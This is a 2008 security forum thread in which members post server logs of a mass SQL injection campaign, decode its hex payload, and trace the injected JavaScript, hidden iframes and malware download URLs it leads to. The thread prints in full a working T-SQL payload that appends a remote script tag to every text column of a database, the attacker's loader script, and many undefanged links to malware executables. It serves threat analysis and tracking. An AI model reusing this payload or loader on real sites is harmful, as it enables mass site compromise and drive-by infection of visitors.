xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on August 07, 2008, 02:18:45 pm
also downloaded.

Quote
hxxp://www.plgou.com/comine/new2.exe
hxxp://www.plgou.com/comine/b.exe
Title: Re: SQL Injected jscript sites
Post by: Serg on August 07, 2008, 06:35:00 pm
One from todays logs on one of our servers

Log entry, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

Decoded, IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [06/Aug/2008:18:43:56  0000] "GET /forum/viewtopic.php?t=14727';DECLARE @S CHAR(4000);SET @S=CAST DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Clear.net)" (malwareremoval.com) "-"

The link is returning a 500 Internal server error.

In all we have seen this same sql injection attempt from 35 indivdual IPs today.
Try google to count infected forum posts...
Title: Re: SQL Injected jscript sites
Post by: Orac on August 09, 2008, 10:38:21 am
Log entry, with IP address obfuscated for privacy.
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39 +0000] "GET /rrpad/pad.xml?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

decoded
Code: [Select]
xxx.xxx.xxx.xxx - - [09/Aug/2008:03:11:39  0000] "GET /rrpad/pad.xml?';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"

Code: [Select]
--11:24:09--  http://sdo.1000mg.cn/csrss/w.js
           => `w.js'
Resolving sdo.1000mg.cn... 121.11.76.85
Connecting to sdo.1000mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/kk/kk.htm></iframe>");
}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

The iframe link to count41.51yes.com returns a 500 internal server error, both iframe links too plgou.com are active.

In all we saw this script from 236 indivdual IPs today.
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 09, 2008, 10:44:05 am
Code: [Select]
http://www.plgou.com/kk/rondll32.exe#version=1,0,0,1
for direct link to file, gonna run it in a sec when i get vmware back up and running

-Brian

different file here also
Code: [Select]
http://www.plgou.com/csrss/rondll32.exe
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 09, 2008, 01:06:15 pm
ok the KK rondll file drops 2 files in the windows font folders


the other one(csrss one) downloads these two
Code: [Select]
http://www.plgou.com/comine/sl.exe

http://www.plgou.com/comine/server.exe
more to come!

Code: [Select]
http://www.plgou.com/csrss/index.html
which lists
Code: [Select]
2008-08-08 http://www.plgou.com/comine/sss.exe
2008-08-08 http://www.plgou.com/comine/sl.exe
2008-08-08 http://www.plgou.com/comine/server.exe

Sl.exe won't run on vista, stupid vista :(

-Brian
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 12, 2008, 08:20:05 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on August 15, 2008, 02:48:13 pm
Quote
hxxp://a.mm861.com/1.js
   <_SCRIPT src="hxxp://a.mm861.com/1.js"></_SCRIPT>
   <_IFRAME src="hxxp://www.6980982jh.com/tt1.html" width=0 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.mydearsister.net/css/ad.htm" width=50 height=0></_IFRAME>
   <_IFRAME src="hxxp://www.80man.com.cn/index.htm" width=0 height=0></_IFRAME>

Thank you Malzilla
Title: Re: SQL Injected jscript sites
Post by: Kayrac on August 15, 2008, 04:41:27 pm
from that js file above

Code: [Select]
51js.th-club.com/1794424.js
51js.th-club.com/2039774.js
51js.th-club.com/2068633.js
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2039774&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.mydearsister.net/css/ad.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2068633&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.80man.com.cn/index.htm
51web.my-free.info/go.asp?we=A-Free-Service-for-Webmasters&svid=31&id=1794424&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1076,873&referrer=&vpage=http%3A//www.6980982jh.com/tt1.html
count14.51yes.com/click.aspx?id=146836447&logo=1
count14.51yes.com/count1.gif
count14.51yes.com/sa.aspx?id=146836447&refe=http%3A//www.6980982jh.com/tt1.html&location=http%3A//www.rigoogle.com/&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
count4.51yes.com/click.aspx?id=48870943&logo=1
count4.51yes.com/count1.gif
count4.51yes.com/sa.aspx?id=48870943&refe=&location=http%3A//www.6980982jh.com/tt1.html&color=32x&resolution=1076x873&returning=0&language=en-us&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%205.1%29
icon.ajiang.net/icon_0.gif
www.6980982jh.com/favicon.ico
www.6980982jh.com/tt1.html
www.80man.com.cn/14.htm
www.80man.com.cn/4561.swf
www.80man.com.cn/WIN%209,0,47,0i.swf
www.80man.com.cn/css/css.exe
www.80man.com.cn/favicon.ico
www.80man.com.cn/flash.htm
www.80man.com.cn/index.htm
www.80man.com.cn/kkk.exe
www.80man.com.cn/office.htm
www.80man.com.cn/re10.htm
www.80man.com.cn/re11.htm
www.mydearsister.net/css/ad.htm
www.mydearsister.net/css/dadongi.asp?dadong=WIN%209,0,47,0
www.mydearsister.net/css/dadongi.swf
www.mydearsister.net/css/dd.exe
www.mydearsister.net/css/dx.exe
www.mydearsister.net/css/index.htm
www.mydearsister.net/css/kr.exe
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/list.txt
www.mydearsister.net/css/mx.exe
www.mydearsister.net/css/ress.htm
www.mydearsister.net/favicon.ico
www.mydearsister.net/u.exe
www.mydearsister.netPOST/Count/Count.asp(application/x-www-form-urlencoded)
www.rigoogle.com/
www.rigoogle.com/flash.htm
www.rigoogle.com/help.exe
www.rigoogle.com/i47.swf
www.rigoogle.com/issf.html
www.rigoogle.com/office.htm
www.rigoogle.com/re10.htm
www.rigoogle.com/swfobject.js
 
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 16, 2008, 09:31:51 am
Thank you.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 16, 2008, 10:54:45 am
Sample log out of a total of 398 seperate injection attempts involving the same script within the last 24 hours, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [16/Aug/2008:03:00:47 +0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx- - [16/Aug/2008:03:00:47  0000] "GET /forums/index.php?act=findpost&pid=14367';DeCLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor Raw 
AS CHAR(4000));ExEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:18:59--  http://www3.800mg.cn/csrss/w.js
           => `w.js'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

SQL injection script
Code: [Select]
window.onerror=function(){return true;}
if(typeof(js8eus)=="undefined")
{
var js8eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=1 src=http://www3.800mg.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Second iframe link
Code: [Select]
--11:21:14--  http://www3.800mg.cn/csrss/new.htm
           => `new.htm'
Resolving www3.800mg.cn... 121.11.76.85
Connecting to www3.800mg.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2063988.js"></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src='http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288' language='javaScript' charset='gb2312'></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


First iframe link
Code: [Select]
--11:24:21--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK


Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Secondary iframe
Code: [Select]
--11:29:33--  http://js.users.51.la/2063988.js
           => `2063988.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2063988" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a3988tf="51la";var a3988pu="";var a3988pf="51la";var a3988su=window.location;var a3988sf=document.referrer;var a3988of="";var a3988op="";var a3988ops=1;var a3988ot=1;var a3988d=new Date();var a3988color="";if (navigator.appName=="Netscape"){a3988color=screen.pixelDepth;} else {a3988color=screen.colorDepth;}<\/script><script>a3988tf=top.document.referrer;<\/script><script>a3988pu =window.parent.location;<\/script><script>a3988pf=window.parent.document.referrer;<\/script><script>a3988ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3988ops=(a3988ops==null)?1: (parseInt(unescape((a3988ops)[2]))+1);var a3988oe =new Date();a3988oe.setTime(a3988oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3988ops+ ";path=/;expires="+a3988oe.toGMTString();a3988ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3988ot==null){a3988ot=1;}else{a3988ot=parseInt(unescape((a3988ot)[2])); a3988ot=(a3988ops==1)?(a3988ot+1):(a3988ot);}a3988oe.setTime(a3988oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3988ot+";path=/;expires="+a3988oe.toGMTString();<\/script><script>a3988of=a3988sf;if(a3988pf!=="51la"){a3988of=a3988pf;}if(a3988tf!=="51la"){a3988of=a3988tf;}a3988op=a3988pu;try{lainframe}catch(e){a3988op=a3988su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2063988&tpages=\'+a3988ops+\'&ttimes=\'+a3988ot+\'&tzone=\'+(0-a3988d.getTimezoneOffset()/60)+\'&tcolor=\'+a3988color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3988of)+\'&vpage=\'+escape(a3988op)+\'" \/>\');<\/script>');


Script link
Code: [Select]
--11:35:17--  http://s135.cnzz.com/stat.php?id=1005288&web_id=1005288
           => `stat.php?id=1005288&web_id=1005288'
Resolving s135.cnzz.com... 219.232.241.139
Connecting to s135.cnzz.com[219.232.241.139]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.38678100 1218883460';
var cnzz_a=gc_cnzz("cnzz_a1005288");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1005288" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://222.77.187.108/stat.htm?id=1005288'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1005288="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 16, 2008, 05:29:36 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 17, 2008, 10:59:07 am
Further to my post August 16, 2008 we had a total of 2,051 injection attempts involving this same script in the last 24 hours
Title: Re: SQL Injected jscript sites
Post by: Orac on August 18, 2008, 09:26:15 am
With reference to my post August 16, 2008 we had a total of 1552 injection attempts involving this same script in the last 24 hours.

The link is now returning a 500 internal server error.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 20, 2008, 09:59:36 am
New SQL injection attempt from sdo.1000mg.cn/csrss/w.js

Original encoded form
Code: [Select]
